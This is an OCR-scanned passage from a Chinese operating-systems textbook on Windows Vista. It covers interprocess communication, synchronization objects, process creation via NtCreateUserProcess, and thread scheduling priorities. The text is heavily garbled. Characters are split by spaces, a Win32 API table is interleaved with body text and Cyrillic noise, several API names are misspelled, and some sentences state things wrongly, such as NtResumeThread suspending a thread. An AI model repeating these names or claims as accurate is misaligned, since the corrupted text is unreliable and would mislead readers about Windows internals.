用 户 态 下 的 步骤 转移 到 了 内 核 态 下 执行 ， 同 时 将 进程 创建 与 起 始 线程 创建 乡 定 在 一 起 进行 。 作 这 种 改变 
的 原因 是 支持 通过 进程 划分 信任 边界 。 一 般 来 说 ， 所 有 用 户 创建 的 进程 被 同等 信任 ， 由 用 户 决 定 信任 边 
界 在 哪里 。 在 Windows Vista 中 的 这 个 改变 ， 允 许 进程 也 可 以 提供 信任 边界 ， 但 是 这 意味 着 对 于 新 进程 句 
柄 来 说 ， 创 建 者 进程 没有 足够 的 权利 在 用 户 态 下 实现 进程 创建 的 细节 。 

1. 进程 间 通信 

线程 间 可 以 通过 多 种 方式 进行 通信 , 包括 管道 、 命 名 管道 、 邮 件 槽 、 套 接 字 、 远 程 过 程 调用 (RPC)、 
共享 文件 等 。 管 道 有 两 种 模式 : 字 节 管道 和 消息 管道 ， 可 以 在 创建 的 时 候选 择 。 字 节 模 式 的 管道 的 工作 
方式 与 UNIX 下 的 工作 方式 一 样 。 消 息 模 式 的 管道 与 字 节 模式 的 管道 大 致 相同 ， 但 会 维护 消息 边界 。 所 
以 写 人 四 次 的 128 字 节 ， 读 出 来 也 是 四 个 128 字 节 的 消息 ， 而 不 会 像 字 节 模式 的 管道 一 样 读 出 的 是 一 个 
512 字 节 的 消息 。 命 名 管道 在 Vista 中 也 是 有 的 ， 跟 普通 的 管道 一 样 都 有 两 种 模式 ， 但 命名 管道 可 以 在 网 
络 中 使 用 ， 而 普通 管道 只 能 在 单机 中 使 用 。 

邮件 槽 是 DS/2 操 作 系 统 的 特性 , 在 Windows 中 实现 只 是 为 了 兼容 性 。 它 们 在 某 种 方式 上 跟 管 道 类 似 ， 
但 不 完全 相同 。 首 先 ， 它 们 是 单 向 的 ， 而 管道 则 是 双向 的 。 而 且 ， 它 们 能 够 在 网 络 中 使 用 但 不 提供 有 保 
证 的 传输 。 最 后 ， 它 们 允许 发 送 进程 将 消息 广播 给 多 个 接收 者 而 不 仅仅 是 一 个 接收 者 。 邮 件 模 和 命名 管 
道 在 Windows 中 都 是 以 文件 系统 的 形式 实现 ， 而 非 可 执行 的 功能 函数 。 这 样 做 就 可 以 通过 现 有 的 远程 文 
件 系统 协议 在 网 络 上 来 访问 到 它们 。 

复 接 字 也 与 管道 类 似 ， 只 不 过 它们 通常 连接 的 是 不 同 机 器 上 的 两 个 进程 。 例 如 ， 一 个 进程 往 一 个 套 
接 字 里 面 写 人 内 容 ， 远 程 机 器 上 的 另外 一 个 进程 从 这 个 套 接 字 中 读 出 来 。 套 接 字 同 样 也 可 以 被 用 在 同一 
台 机 器 上 的 进程 通信 ， 但 是 因为 它们 比 管道 带 来 了 更 大 的 开销 ， 所 以 一 般 来 说 它们 只 被 用 于 网 络 环境 下 
的 通信 。 套 接 字 原来 是 为 伯克利 UNIX 而 设计 的 ， 它 的 实现 代码 很 多 都 是 可 用 的 ， 正 如 Windows 发 布 日 
志 里 面 所 写 的 ，Windows 代 码 中 使 用 了 一 些 伯克利 的 代码 及 数据 结构 。 

远程 过 程 调用 (RPC) 是 一 种 进程 A 命令 进程 B 调 用 进程 B 地 址 空间 中 的 一 个 函数 ， 然 后 将 执行 结果 
返回 给 进程 A 的 方式 。 在 这 个 过 程 中 对 参数 的 限制 很 多 。 例 如 ， 如 果 传 递 的 是 个 指针 ， 那 么 对 于 进程 B 
来 说 这 个 指针 毫 无 意义 ， 因 此 必须 把 数据 结构 打包 起 来 然后 以 进程 无 关 的 方式 传输 。 实 现 RPC 的 时 候 ， 
通常 是 把 它 作 为 传输 层 之 上 的 抽象 层 来 实现 。 例 如 对 于 Windows 来 说 ， 可 以 通过 TCP/IP 套 接 字 、 命 名 管 
道 、ALPC 来 进行 传输 。ALPC 的 全 称 是 高 级 本 地 过 程 调用 (Advanced Local Procedure Call) ， 它 是 内 核 
态 下 的 一 种 消息 传递 机 制 ， 为 同一 台 机 器 中 的 进程 间 通 信 作 了 优化 ， 但 不 支持 网 络 间 通信 。 基 本 的 设计 
思想 是 可 以 发 送 有 回复 的 消息 ， 以 此 来 实现 一 个 轻 量 级 的 RPC 版 本 ， 提 供 比 ALPC 更 丰富 的 特性 。ALPC 
的 实现 是 通过 拷贝 参数 以 及 基于 消息 大 小 的 临时 共享 内 存 分 配 。 

最 后 ， 进 程 间 可 以 共享 对 象 ， 如 段 对 象 。 段 对 象 可 以 同时 被 映射 到 多 个 进程 的 虚拟 地 址 空间 中 , 一 
个 进程 执行 了 写 操作 之 后 ， 其 他 进程 可 以 也 可 以 看 见 这 个 写 操作 。 通 过 这 个 机 制 ， 在 生产 者 消费 者 问题 
中 用 到 的 共享 缓冲 区 就 可 以 轻松 地 实现 。 

2. 同步 

进程 间 也 可 以 使 用 多 种 形式 的 同步 对 象 。 就 像 Windows Vista 中 提供 了 多 种 形式 的 进程 间 通 信 机 制 
一 样 ，Vista 也 提供 了 多 种 形式 的 同步 机 制 ， 包 括 信号 量 、 互 斥 量 、 临 界 区 和 事件 。 所 有 的 这 些 机 制 只 在 
线程 上 工作 ， 而 非 进程 。 所 以 当 一 个 线程 由 于 一 个 信号 量 而 阻塞 时 ， 同 一 个 进程 的 其 他 线程 (如果 有 的 
话 ) 会 继续 运行 而 并 不 会 被 影响 。 

使 用 Win32 的 API 函 数 CreateSemaphore 可 以 创建 一 个 信号 量 ， 可 以 将 它 初 始 化 为 一 个 给 定 的 值 ， 
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同时 也 可 以 指定 最 大 值 。 信 号 量 是 一 个 内 核 态 对 象 ， 因 此 拥有 安全 搞 述 符 和 句柄 。 信 号 量 的 句柄 可 以 通 
过 使 用 DuplicateHandler 来 进行 复制 ， 然 后 传递 给 其 他 进程 使 得 多 个 进程 可 以 通过 相同 的 量 来 进行 
同步 。 在 Win32 的 名 字 空 间 中 一 个 信号 量 也 可 以 被 命名 ， 可 以 拥有 一 个 ACL 集 合 来 保护 它 。 有 些 时 候 通 
过 名 字 来 共享 信号 量 比 通过 拷贝 句 栖 更 合适 。 

对 up 和 down 的 调用 也 是 有 的 ， 只 不 过 它们 的 函数 名 看 起 来 比较 奇怪 : ReleaseSemaphore (ир) 
和 WaitForSingleObject (down)。 可 以 给 WaitForSingleObject 一 个 超时 时 间 ， 使 得 尽管 此 时 信号 量 仍 
然 是 0， 调 用 它 的 线程 仍然 可 以 被 释放 (尽管 定时 器 重新 引入 了 竞 态 ) 。WaitForSingleObject 和 
WaitForMultipleObject 是 将 在 11.3 节 中 讨论 的 分 发 者 对 象 的 常见 接口 。 尽 管 有 可 能 将 单个 对 象 的 API 封 
装 成 看 起 来 更 加 像 信 号 量 的 名 字 ， 但 是 许多 线程 使 用 多 个 对 象 的 版 本 ， 这 些 对象 可 能 是 各 种 各 样 的 同步 
对 象 ， 也 可 能 是 其 他 类 似 进程 或 线程 结束 、1/O 结 束 、 消 息 到 达 套 接 字 和 端口 等 事件 。 

互 斥 量 也 是 用 于 同步 的 内 核 太 对象, 但 是 比 信号 量 简单 因为 互 斥 量 不 需要 计数 器 。 它 们 其 实 是 锁 ， 
上 锁 的 函数 是 WaitForSingleObject， 解 锁 的 函数 是 ReleaseMutex。 就 像 信号 量 句 柄 一 样 ， 互 斥 量 的 句 
柄 也 可 以 复制 ， 并 且 在 进程 间 传递 ， 从 而 不 同 进程 间 的 线程 可 以 访问 同一 个 互 斥 量 。 

第 三 种 同步 机 制 是 临界 区 ， 实 现 的 是 临界 区 的 概念 。 临 界 区 在 Windows 中 与 互 斥 量 类 似 ， 但 是 临界 
区 相对 于 主创 建 线程 的 地 址 空间 来 说 是 本 地 的 。 因 为 临界 区 不 是 内 核 态 的 对 象 ， 所 以 它们 没有 显 式 的 句 
柄 或 安全 描述 符 ， 而 且 也 不 能 在 进程 间 传 递 。 上 锁 和 解 镇 的 函数 分 别 是 EnterCriticalSection 和 
LeaveCriticalSection。 因 为 这 些 API 函 数 在 开始 的 时 候 只 是 在 用 户 空间 中 ， 只 有 当 需 要 阻塞 的 时 候 才 调 
用 内 核 函 数 ， 它 们 比 互 斥 量 快 得 多 。 在 需要 的 时 候 ， 可 以 通过 合并 自 旋 锁 (在 多 处 理 器 上 ) 和 内 核 同 步 
机 制 来 优化 临界 区 。 在 许多 应 用 中 ， 大 多 数 的 临界 区 几乎 不 会 被 竞争 或 者 只 被 锁 住 很 短 的 时 间 ， 以 至 于 
没 必要 分 配 一 个 内 核 同步 对 象 ， 这 样 会 极 大 地 节省 内 核 内 存 。 

我 们 讨论 的 最 后 一 种 同步 机 制 叫 事件 ， 它 使 用 内 核 态 对 象 。 就 像 我 们 前 面 描述 的 ， 有 两 类 的 事件 一 
通知 事件 和 同步 事件 。 一 个 事件 的 状态 有 两 种 : 收 到 信号 和 没收 到 信号 。 一 个 线程 通过 调用 
WaitForSingleObject 来 等 待 一 个 事件 被 信号 通知 。 如 果 另 一 个 线程 通过 SetEvent 给 事件 发 信和 号， 会 发 生 
什么 取决 于 这 个 事件 的 类 型 。 对 于 通知 事件 


来 说 ， 所 有 等 待 线程 都 会 被 释放 ， 并 且 事件 ”上 Win32API 函 数 Юй ж 
保持 在 set 状 态 ， 直 到 手工 调用 ResetEvent | CreateProcess 创建 一 个 新 的 进程 
进行 清除 ， 对 于 同步 事件 来 说 ， 如 果 有 一 个 上 Createrhread | 在 已 存在 的 进程 中 创建 一 个 新 的 线 各 


或 多 个 线程 在 等 待 ， 那 么 有 且 仅 有 一 个 线程 eeaeee жан 


会 被 唤醒 并 且 事件 被 清除 。 另 一 个 替换 的 操 Бете кнн нн. 
作 是 PulseEvent， 像 SetEvent 一 样 ,除了 在 没 。 [EFiber ЕТ ИЛ 

有 人 等 待 的 时 候 脉 冲 会 丢失 ， 而 事件 也 被 清 SwichToFiber | 在 当前 线程 中 运行 另 一 纤 程 
除 。 相 反 ， 如 果 调 用 SetEvent 时 没有 等 待 的 [smo 设置 进程 的 优先 级 类 


线程 ， 那 么 这 个 设置 动作 依然 会 起 作用 ,被 | SetThreadPriority 设置 线程 的 优先 级 
设置 的 事件 处 于 被 信号 通知 的 状态 ， 所 以 当 CreateSemaphore 创建 一 个 新 的 信号 量 


后 面 的 那个 线程 调用 等 待 事件 的 API 时 ， 这 | CreatsMutex БЕТҮ 
个 线程 将 不 会 等 待 而 直接 返回 。 OpenSemaphore es 
Win32 的 API 中 关于 进程 、 线 程 、 纤 程 | OpenMutex 打开 一 个 现 有 的 互 斥 量 


的 个 数 将 近 100 个 ， 其 中 大 量 的 是 各 种 形式 WEFarSngleOblact 等 待 一 个 单一 的 信号 最 、 互 斥 量 等 
的 处 理 IPC 的 函数 。 对 上 面 讨论 的 总 结 和 另 watrorMuipleCbiects | 等 竺 一 系列 已 有 包 柄 的 对 旬 
一 些 比较 重要 的 内 容 可 以 参见 图 11-26。 досе ын ШЕ УГЕ 


э 4 ReleaseMutex 释放 互 斥 量 使 其 他 线程 可 以 获得 它 
可 以 注意 到 不 是 所 有 的 这 些 都 是 系统 使 信号 最 增加 1 


调用 。 其 中 有 一 些 是 包装 器 ， 有 一 些 包含 了 Haec аи 
重要 的 库 代码 ， 这 些 库 代 码 将 Win32 的 接口 үс 释放 临界 区 的 锁 
映射 到 本 地 NT 接口 。 另 外 一 些 ， 例 如 纤 程 

的 API， 全 部 都 是 用 户 态 下 的 函数 ， 因 为 就 ”图 11-26 一 些 管理 进程 、 线 程 以 及 纤 程 的 一 些 Win32 调 用 
像 我 们 之 前 提 到 的 ，Windows Vista 的 内 核 态 中 根本 没有 纤 程 的 概念 ， 纤 程 完全 都 是 由 用 户 态 下 的 库 来 实 
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现 的 。 
11.4.3 进程 和 线程 的 实现 

本 节 将 用 更 多 细节 来 讲述 Windows 如 何 创 建 一 个 进程 。 因 为 Win32 是 最 具 文 档 化 的 接口 ， 因 此 我 们 
将 从 这 里 开始 讲述 。 我 们 迅速 进入 内 核 来 理解 创建 一 个 新 进程 的 本 地 API 调 用 是 如 何 实现 的 。 这 里 有 很 
多 细节 我 们 都 将 略 过 ， 比 如 在 创建 一 个 路 径 的 时 候 ，WOW16 和 WOW64 有 怎样 专用 的 代码 ， 以 及 系统 
如 何 提供 特定 应 用 的 修补 来 修正 应 用 程序 中 的 小 的 不 兼容 性 和 延迟 错误 。 我 们 主要 集中 在 创建 进程 时 执 
行 的 主 代码 路 径 ， 以 及 看 一 看 我 们 已 经 介绍 的 知识 之 间 还 欠缺 的 一 些 细节 。 

当 用 一 个 进程 调用 Win32 CreateProcess 系 统 调用 的 时 候 ， 则 创建 一 个 新 的 进程 。 这 种 调用 使 用 
kemel32.dll 中 的 一 个 (MAE) 进程 来 分 几 步 创 建新 进程 ， 其 中 会 使 用 多 次 系统 调用 和 执行 其 他 的 一 些 操作 。 

1) 把 可 执行 的 文件 名 从 一 个 Win32 路 径 名 转化 为 一 个 NT 路 径 名 。 如 果 这 个 可 执行 文件 仅 有 一 个 名 
字 ， 而 没有 一 个 目录 名 ， 那 么 就 在 默认 的 目录 里 面 查找 (包括 ， 但 不 限于 ， 那 些 在 PATH 环境 变量 中 的 )。 

2) 绑 定 这 个 创建 过 程 的 参数 ， 并 且 把 它们 和 可 执行 程序 的 完全 路 径 名 传递 给 本 地 API 
NtCreateUserProcess。( 这 个 API 被 增加 到 Window Vista 使 得 创建 进程 的 细节 可 以 在 内 核 态 里 处 理 ， 从 
而 让 进程 可 以 在 可 信 的 边界 内 使 用 。 之 前 介绍 的 那些 API 仍 然 是 存在 的 ， 只 是 不 再 被 Win32 的 
CreateProcess 调 用 使 用 。) 

3) 在 内 核 态 里 运行 ，NtCreateUserProcess 执 行 参数 ， 然 后 打开 这 个 进程 的 映像 ， 创建 一 个 内 存 区 
IHR (section object) ， 它 能 够 用 来 把 程序 映射 到 新 进程 的 虚拟 地 址 空间 。 

4) 进程 管理 器 分 配 和 初始 化 进程 对 象 。( 对 于 内 核 和 执行 县 ， 这 个 内 核 数据 结构 就 表示 一 个 进程 。) 

5) 内 存 管理 器 通过 分 配 和 创建 页 目录 及 虚拟 地 址 描述 符 来 为 新 进程 创建 地 址 空间 。 虚 拟 地 址 描述 符 
描述 内 核 态 部 分 ， 包 括 特定 进程 的 区 域 ， 例 如 自 映射 的 页 目录 入 口 可 以 为 每 一 个 进程 在 内 核 态 使 用 内 核 
虚拟 地 址 来 访问 它 整 个 页 表 中 的 物理 页 面 。 

б) 一 个 句 酉 表 为 新 的 进程 所 创建 。 所 有 来 自 于 调用 者 并 允许 被 继承 的 句柄 都 被 复制 到 这 个 句柄 表 中 。 

Т) 共享 的 用 户 页 被 映射 ， 并 且 内 存 管 理 器 初始 化 一 个 工作 集 的 数据 结构 ， 这 个 数据 结构 是 在 物理 内 
存 缺 少 的 时 候 用 来 决定 哪些 页 可 以 从 一 个 进程 里 面 移出 。 可 执行 映像 中 由 内 存 区 对 象 表示 的 部 分 会 被 映 
射 到 新 进程 的 用 户 态 地 址 空间 。 

8) 执行 体 创建 和 初始 化 用 户 态 的 进程 环境 块 (PEB)， 这 个 PEB 为 用 户 态 和 内 核 用 来 维护 进程 范围 的 
状态 信息 ， 例 如 用 户 态 的 堆 指针 和 可 加 载 库 列表 (DLL)。 

9) 虚拟 内 存 是 分 配 在 (ID 表 ) 新 进程 里 面 的 ， 并 且 用 于 传递 参数 ， 包 括 环境 变量 和 命令 行 。 

10) 一 个 进程 ID 从 特殊 的 句柄 表 (DR) 分 配 ， 这 个 句柄 表 是 为 了 有 效 地 定位 进程 和 线程 局 部 唯一 
的 ID 。 

П) 一 个 线程 对 象 被 分 配 和 初始 化 。 在 分 配 线程 环境 块 (TEB) 的 同时 ， 也 分 配 一 个 用 户 态 栈 。 包 
含 了 线程 的 为 CPU 寄 存 器 保持 的 初始 值 ( 包 括 指令 和 栈 指针 ) 的 CONTEXT 记 录 也 被 初始 化 了 。 

12) 进程 对 象 被 放 入 进程 全 局 列表 中 。 进 程 和 线程 对 象 的 句 枉 被 分 配 到 调用 者 的 句柄 表 中 。ID 表 会 
为 初始 线程 分 配 一 个 ID。 

13) NtCreateUserProcess 向 用 户 态 返回 新 建 的 进程 ， 其 中 包括 处 于 就 绪 并 被 挂 起 的 单一 线程 。 

14) 如 果 NT API 失 败 ，Win32 代 码 会 查看 进程 是 否 属于 另 一 子 系统 ， 如 WOW64。 或 者 程序 可 能 设 
置 为 在 调试 状态 下 运行 。 以 上 特殊 情况 由 用 户 态 的 CreateProcess 代 码 处 理 。 

15) 如 果 NtCreateUserProcess 成 功 ， 还 有 一 些 操作 要 完成 。Win32 进程 必须 向 Win32 子 系统 进程 
Csrss.exe 注 册 。Kernel32.dll 向 csrss.exe 发 送信 息 一 一 新 的 进程 及 其 句柄 和 线程 句柄 ， 从 而 进程 可 以 自我 
复制 了 。 进 程 和 线程 加 入 子 系统 列表 中 ， 从 而 它们 拥有 了 所 有 Win32 的 进程 和 线程 的 完整 列表 。 子 系统 
此 时 就 显示 一 个 的 带 沙漏 光标 表明 系统 正 运行 ， 但 光标 还 能 使 用 。 当 进程 首次 调用 GUI 函数 ， 通 常 是 创 
建新 窗口 ， 光 标 将 消失 (如果 没 有 调用 到 来 ，2 秒 后 就 会 超时 )。 

16) 如 果 进 程 受 限 ， 如 低 权限 的 Internet Explorer， 令 牌 会 被 改变 ， 限 制 新 进程 访问 对 象 。 

17) 如 果 应 用 程序 被 设置 成 需要 与 当前 Windows 版 本 加 热 层 (shim) 地 兼容 运行 ， 则 特定 的 垫 层 将 
运行 ( 垫 层 通常 封装 库 调用 以 稍微 修改 它们 的 行为 ， 例 如 返回 一 个 假 的 版 本 号 或 者 延迟 内 存 的 释放 ) 。 
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18) 最 后 ， 调 用 NtResumeThread 挂 起 线程 ， 并 把 这 个 结构 返回 给 包含 所 创建 的 进程 和 线程 的 ID 、 
句柄 的 调用 者 。 

调度 

Windows 内 核 没 有 任何 中 央 调度 线程 。 所 以 ， 当 一 个 线程 不 能 够 再 执行 时 ， 线 程 将 进入 内 核 态 ， 调 
度 线程 再 决定 转向 的 下 一 个 线程 。 在 下 面 这 些 情况 下 ， 当 前 正在 执行 的 线程 会 执行 调度 程序 代码 ， 

1. 当前 执行 的 线程 发 生 了 信号 量 、 互 斥 、 事 件 、1/O 等 类 型 的 阻塞 。 

2. 线程 向 一 个 对 象 发 信号 (如 发 一 个 信号 或 者 是 唤醒 一 个 事件 ) 时 。 

3. 配额 过 期 。 

第 一 种 情况 ， 线 程 已 经 在 内 核 态 运行 并 开始 对 调度 器 或 输入 输出 对 象 执行 操作 了 。 它 将 不 能 继续 执 
行 ， 所 以 线程 会 请 求 调度 程序 代码 寻找 装载 下 一 个 线程 的 CONTEXT 记 录 去 恢复 其 执行 。 

第 二 种 情况 ， 线 程 也 是 在 内 核 中 运行 。 但 是 ， 在 向 一 些 对 象 发 出 信号 后 ， 它 肯定 还 能 够 继续 执行 ， 
因为 发 信号 对 象 从 来 没有 受到 阻塞 。 然 而 ， 线 程 必 须 请 求 调度 程序 ， 来 观测 它 的 执行 结果 是 否 释放 了 -一 
个 具有 更 高 调度 优先 级 的 正 准备 运行 的 线程 。 如 果 是 这 样 ， 因 为 Windows 完 全 是 可 抢占 式 的 ， 所 以 就 会 
发 生 一 个 线程 切换 (例如 ， 线 程 切换 可 以 发 生 在 任何 时 候 ， 不 仅仅 是 在 当前 线程 结束 时 ) 。 但 是 ， 在 多 
处 理 器 的 情况 下 ， 处 于 就 绪 状 态 的 线程 会 在 另 一 个 CPU 上 被 调度 ,那么 ， 即使 原来 线程 拥有 较 低 的 调度 优 
先 级 ， 也 能 在 当前 的 CPU 上 继续 执行 。 

第 三 种 情况 ， 内 核 态 发 生 中 断 ， 这 时 线程 执行 调度 程序 代码 找到 下 一 个 运行 的 线程 。 由 于 取决 于 
其 他 等 待 的 线程 ， 可 能 会 选择 同样 的 线程 ， 这 样 线程 就 会 获得 新 的 配额 ， 可 以 继续 执行 。 否 则 发 生 线 
程 切换 。 

在 另外 两 种 情况 下 ， 调 度 程序 也 会 被 调度 ， 

1) 一 个 输入 输出 操作 完成 时 。 

2) 等 待 时间 结 束 时 。 

在 第 一 种 情况 下 ， 线 程 可 能 处 于 等 待 输入 输出 时 被 释放 然后 执行 。 如 果 不 保证 最 小 执行 时 间 ， 必 须 
检查 是 否 可 以 事先 对 运行 的 线程 进行 抢占 。 调 度 程序 不 会 在 中 断 处 理 程序 中 运行 (因为 那 使 中 断 关 闭 保 
持 太 久 )。 相 反 ， 中 断 处 理发 生 后 ，DPC 会 排队 等 待 一 会 儿 。 第 二 种 情况 下 ， 线程 已 经 对 一 个 信号 量 进 
行 了 down 操 作 或 者 因 一 些 其 他 对 象 而 被 阻塞 ， 但 是 定时 器 已 经 过 期 。 对 于 中 断 处 理 程序 来 说 ， 有 必要 
让 DPC 再 一 次 排队 等 待 ， 以 防止 它 在 定时 器 中 断 处 理 程序 时 运行 。 

如 果 一 个 线程 在 这 个 时 刻 已 到 就 绪 ， 则 调度 程序 将 会 被 唤醒 并 且 如 果 新 的 可 运行 线程 有 较 高 的 优先 
级 ， 那 么 和 情形 1 的 情况 类 似 ， 当 前 的 线程 会 被 抢占 。 

现在 让 我 们 来 看 看 具体 的 调度 算法 。Win32 API 提 供 两 个 API 来 影响 线程 调度 。 首先 ， 有 一 个 叫 
SetPriorityClass 的 用 来 设 定 被 调用 进程 中 所 有 线程 的 优先 级 。 其 等 级 可 以 是 : 实时 、 高 、 高 于 标准 、 
标准 、 低 于 标准 和 空闲 的 。 优先 级 决定 进程 的 先后 顺序 。 (在 Vista 系 统 中 ， 进程 优先 级 等 级 也 可 以 被 一 
个 进程 用 来 临时 地 把 它 自己 标记 为 后 台 运行 (background) 状态 ， 即 它 不 应 该 被 任何 其 他 的 活动 进程 所 
FH.) 注意 优先 级 是 对 进程 而 言 的 ， 但 是 实际 上 会 在 每 个 线程 被 创建 的 时 候 通 过 设置 每 个 线程 开始 运 
行 的 基本 优先 级 可 以 影响 进程 中 每 条 线程 的 实际 优先 级 。 

第 二 个 就 是 SetThreadPriority。 它 根据 进程 的 优先 级 类 来 设 定 进程 中 每 个 线程 的 相对 优先 级 (可 能 
地 ， 但 是 不 必然 地 ， 调 用 线程 )。 可 划分 如 下 等 级 ， 紧 要 的 、 最 高 的 、 高 于 标准 的 、 标 准 的 、 低 于 标准 
的 、 最 低 的 和 休眠 的 。 时 间 紧 急 的 线程 得 到 最 高 的 非 即时 的 调度 优先 ， 而 空闲 的 线程 不 管 其 优先 级 类 别 
都 得 到 最 低 的 优先 级 。 其 他 优先 级 的 值 依据 优先 级 的 等 级 来 定 ， 依 次 为 (+2, +1, 0, 一 1, -2)。 进 程 优先 
级 等 级 和 相对 线程 优先 级 的 使 用 使 得 能 够 更 容易 地 确定 应 用 程序 的 优先 级 。 

调度 程序 按照 下 列 方式 进行 调度 。 系 统 有 32 个 优先 级 ， 从 0 到 31。 依照 图 11-27 的 表格 ， 进 程 优先 
级 和 相对 线程 优先 级 的 组 合 形成 32 个 绝对 线程 优先 级 。 在 表格 的 数字 决定 了 线程 的 基本 优先 级 (base 
priority) 。 除 此 之 外 ， 每 条 线程 都 有 当前 优先 级 (current priority), 这 个 当前 的 优先 级 可 能 会 高 于 (但 
是 不 低 于 ) 前 面 提 到 的 基本 优先 级 ， 关 于 这 一 点 我 们 稍 后 将 会 讨论 。 
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图 11-27 Win32 优 先 级 到 Windows 优 先 级 的 映射 


为 了 使 用 这 些 优先 级 进行 调度 ， 系 统 维护 一 个 包含 32 个 线程 列表 的 队列 ， 分 别 对 应 图 11-27 中 的 0 一 
31 的 不 同等 级 。 每 个 列表 包含 了 就 绪 线程 对 应 的 优先 级 。 基 本 的 调度 算法 是 从 优先 级 队列 中 从 31 到 0 的 
从 高 优先 级 到 低 优先 级 的 顺序 查找 。 一 旦 一 个 非 空 的 列表 被 找到 ， 等 待 队 首 的 线程 就 运行 一 个 时 间 片 。 
如 果 时 间 配 额 已 用 完 , 这 个 线程 排 到 其 优先 级 的 队 尾 ， 而 排 在 前 面 的 线程 就 接 下 来 运行 。 换 句 话说 ， 当 
在 最 高 的 优先 级 有 多 条 线程 处 于 就 绪 状 态 ， 它 们 就 按时 间 片 轮转 法 来 调度 。 如 果 没 有 就 绪 的 线程 ， 那 么 
处 理 器 空间 ， 并 设置 成 低 功 耗 状 态 来 等 待 中 断 的 发 生 。 

值得 注意 的 是 ， 调 度 取决 于 线程 而 不 是 取决 于 线程 所 属 的 进程 。 因 此 调度 程序 并 不 是 首先 查看 进程 
然后 再 是 进程 中 的 线程 。 它 直接 找到 线程 。 调 度 程序 并 不 考虑 哪个 线程 属于 哪个 进程 ， 除 非 进行 线程 切 
换 时 需要 做 地 址 空间 的 转换 。 

为 了 改进 在 具有 大 量 处 理 器 的 多 处 理 器 情况 下 的 调度 算法 的 可 伸缩 性 ， 调 度 管理 器 尽力 不 给 全 局 的 
优先 级 表 的 数组 加 上 一 个 全 局 的 锁 来 实现 同步 访问 控制 。 相 反 地 ， 对 于 一 个 准备 到 CPU 的 线程 来 说 ， 若 
是 处 理 器 已 就 位 ， 则 可 以 让 它 真 接 进行 ， 而 不 必 进行 加 锁 操 作 。 

对 于 每 一 个 进程 ， 调 度 管理 器 都 维护 了 一 个 理想 处 理 器 (ideal processor) 记录 ， 它 会 在 尽 可 能 的 
时 候 让 线程 在 这 个 理想 处 理 器 上 运行 。 这 改善 了 系统 的 性 能 ， 因 为 线程 所 用 到 的 数据 驻 留 在 理想 处 理 器 
的 内 存 中 。 调 度 管理 器 可 以 感知 多 处 理 器 的 环境 ， 并 且 每 一 个 处 理 器 有 自己 的 内 存 ， 可 以 运行 需要 任意 
大 小 内 存 空间 的 程序 一 一 但 是 如 果 内 存 不 在 本 地 ， 则 会 花费 较 大 的 时 间 开 销 。 这 些 系统 被 认为 是 NUMA 
( 非 统一 内 存 地 址 ) 设备 。 调 度 管理 器 努力 优化 线程 在 这 类 计算 机 上 的 分 配 。 当 线程 出 现 缺 页 错误 时 ， 
内 存 管理 器 努力 把 属于 理想 处 理 器 的 
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NUMA 节 点 的 物理 页 面 分 配给 线程 。 下 一 个 要 运行 的 线程 
队 首 的 队列 在 图 11-28 中 表示 。 这 个 


图 表明 实际 上 有 四 类 优先 等 级 : 实时 级 、 
用 户 级 、 零 页 和 空闲 级 , 即 当 它 为 -1 时 有 
效 。 这 些 值得 我 们 深入 讨论 。 优 先 级 16 一 16 
31 属 于 实时 级 的 一 类 ， 用 来 为 构建 满足 实 
时 性 约束 的 系统 。 处 于 实时 级 的 线程 优先 


于 任何 动态 分 配 级 别 的 线程 ， 但 是 不 先 于 Ган i 
DPC 和 ISR。 如 果 一 个 实时 级 的 应 用 程序 

想 要 在 系统 上 运行 ， 它 就 要 求 设备 驱动 不 А 

能 运行 DPC 和 ISR 更 多 的 额外 时 间 ， 因 为 。 零 页 线程 “0 Е 
这 样 可 能 导 至 这些 实时 线程 错过 它们 的 截 。 空间 线 程 一 


止 时 间 。 
用 户 态 下 不 能 运行 实时 级 的 线程 。 如 


图 11-28 Windows Vista 为 线程 支持 32 个 优先 级 


果 一 个 用 户 级 线程 在 一 个 高 优先 级 运行 ， 比 如 说 ， 键 盘 或 者 鼠标 线程 进入 了 一 个 死 循环 ， 键 盘 或 者 恨 标 
永远 得 不 到 运行 从 而 系统 被 有 效 地 挂 起 。 把 优先 级 设置 为 实时 级 的 权限 ， 需 要 启用 进程 令 牌 中 相应 的 特 
权 。 通 常用 户 没有 这 个 特权 。 
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应 用 程序 的 线程 通常 在 优先 级 1 ~15 上 运行 。 通 过 设 定 进程 和 线程 的 优先 级 ， 一 个 应 用 程序 可 以 决 
定 哪 些 线程 得 到 偏爱 (获得 更 高 优先 级 ) 。 ZeroPage 系 统 线程 运行 在 优先 级 0 并 且 把 所 有 要 释放 的 页 转化 
为 全 部 包含 0 的 页 。 每 一 个 实时 的 处 理 器 都 有 一 个 独立 的 ZeroPage 线 程 。 

每 个 线程 都 有 一 个 基于 进程 优先 级 的 基本 优先 级 和 一 个 线程 自己 的 相对 优先 级 。 用 于 决定 一 个 线程 
在 32 个 列表 中 的 哪 一 个 列表 进行 排队 的 优先 级 取决 于 当前 优先 级 ， 通 常 是 得 到 和 当前 线程 的 基本 优先 级 
一 样 的 优先 级 ， 但 并 不 总 是 这 样 。 在 特定 的 情况 下 ， 非 实时 线程 的 当前 优先 级 被 内 核 一 下 子 提 到 尽 可 能 
高 的 优先 级 〈 但 是 不 会 超过 优先 级 15) 。 因 为 图 11-28 的 排列 以 当前 的 优先 级 为 基础 ， 所 以 改变 优先 级 可 
以 影响 调度 。 对 于 实时 优先 级 的 线程 ， 没 有 任何 的 调整 。 

现在 让 我 们 看 看 一 个 线程 在 什么 样 的 时 机 会 得 到 提升 。 首 先 ， 当 输入 输出 操作 完成 并 且 唤醒 一 个 等 
待 线程 的 时 候 ， 优 先 级 一 下 子 被 提高 ， 给 它 一 个 快速 运行 的 机 会 ， 这 样 可 以 使 更 多 的 1/O 可 以 得 到 处 理 。 
这 里 保证 W/O 设备 处 于 忙碌 的 运行 状态 。 提 升 的 幅度 依赖 于 输入 输出 设备 ， 典 型 地 磁盘 片 对 应 于 1 级 ， 串 
行 总 线 对 应 于 2 级 ，6 级 对 应 于 键盘 ，8 级 对 应 于 声卡 。 

其 次 ， 如 果 一 个 线程 在 等 待 信号 量 ， 互 斥 量 同步 或 其 他 的 事件 ， 当 这 些 条 件 满足 线程 被 唤醒 的 时 候 ， 
如 果 它 是 前 台 的 进程 〈 该 进程 控制 键盘 输入 发 送 到 的 窗口 ) 的 话 ， 这 个 线程 就 会 得 到 两 个 优先 级 的 提升 ， 
其 他 情况 则 只 提升 一 个 优先 级 。 这 倾向 于 把 交互 式 的 进程 优先 级 提升 到 8 级 以 上 。 最 后 ， 如 果 一 个 窗口 
